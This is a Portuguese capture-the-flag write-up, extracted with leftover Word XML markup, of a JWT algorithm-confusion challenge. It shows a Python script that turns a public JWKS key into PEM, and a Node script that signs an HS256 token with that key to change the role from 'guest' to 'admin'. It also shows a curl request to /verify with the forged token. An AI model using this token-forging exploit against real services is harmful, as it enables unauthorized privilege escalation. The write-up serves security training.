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Challenge JWT-Algorithm Confusion.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web estava acessível na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8000/TCP.</w:t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enumeração da aplicação, foi identificada a rota.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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/.well-known/jwks.json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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jwks.json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 acessível sem autenticação.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Esse arquivo contém um conjunto de chaves públicas criptográficas (JWKS – JSON Web Key Set).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 chaves são utilizadas para validar a assinatura de tokens JWT recebidos pela aplicação.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25400" l="25400" r="25400" t="2540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jwks.json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convertido para o formato PEM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-----BEGIN PUBLIC KEY-----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padrão utilizado por ferramentas como OpenSSL, Nginx e aplicações Java, por meio de um script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Python 3.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 &lt;&lt;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base64</w:t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cryptography.hazmat.primitives.asymmetric.rsa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RSAPublicNumbers</w:t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cryptography.hazmat.backends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default_backend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 cryptography.hazmat.primitives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serialization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jwk = {</w:t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"RSA"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"AQAB"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"kid"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"db465321-6732-440f-94b9-2c5781afeecd"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lsVHqJkvFUc5xxy6ihHpt14fsB4oIfuE7NryVy3Mp6gmy5kL3rnndwHR8OzfFANdrqpTTF1zzTmftq3vRmRUHc0LegYoCFB4HfKTuftPL0VVRKl4xufy1q2jfv2nI4fYYJpbs4EEzcdgwB4a1OeTLKgyDs--qI9BQ4wP2mn8lJfX-j3pbx0MBBqOfRY2HH6DzLjO5wOHu5TZblhRVvUDd8oMPB-O_VMeCajGvXQCoFqgbcJF2yyTp4yTOQmm7qtg2oggJKTL180RSwKNCh9opVxtB2aet21-2hoqrPYqJviXv_IAsn83xtLAb2Jvzb0Wv661-sVl4Kn4P7CfxtFVQ"</w:t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 b64_to_int(b64):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data = base64.urlsafe_b64decode(b64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'=='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.from_bytes(data,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 = b64_to_int(jwk[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 = b64_to_int(jwk[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pub_numbers = RSAPublicNumbers(e, n)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pub_key = pub_numbers.public_key(default_backend())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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pem = pub_key.public_bytes(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encoding=serialization.Encoding.PEM,</w:t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format=serialization.PublicFormat.SubjectPublicKeyInfo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with open(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'jwks.pub'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as f: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ab/>
        <w:t xml:space="preserve">f.write(pem)</w:t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print(pem.decode())</w:t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EOF</w:t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00400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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chave gerada teve seu output salvo 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public_key.pem.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utilizando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generate.js,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criado um novo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modificada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permitindo elevação de privilégios na aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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generate.js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cat generate.js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jwt = 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'jwt-simple'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fs = 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 =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"guest"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"admin"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key = fs.readFileSync(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"./public_key.pem"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).toString();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 = jwt.encode(data, key,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"HS256"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console.log(token);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node generate.js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-X GET -H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&lt;YOUR-TOKEN&gt;"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//&lt;CHALL-IP&gt;:8000/verify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enviada uma requisição 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/verify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forjado.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validou o token.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foi retornada na resposta.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6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JWT-Algorithm Confusion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6AsRFdnkrO52SGcV141JaSAKlQ==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguNnZyb2dvcm0zNnE5OAByITFwQWY4WEJTTE51TkVnUVBIc0R5Z3RreGVDOW92bm5rUw==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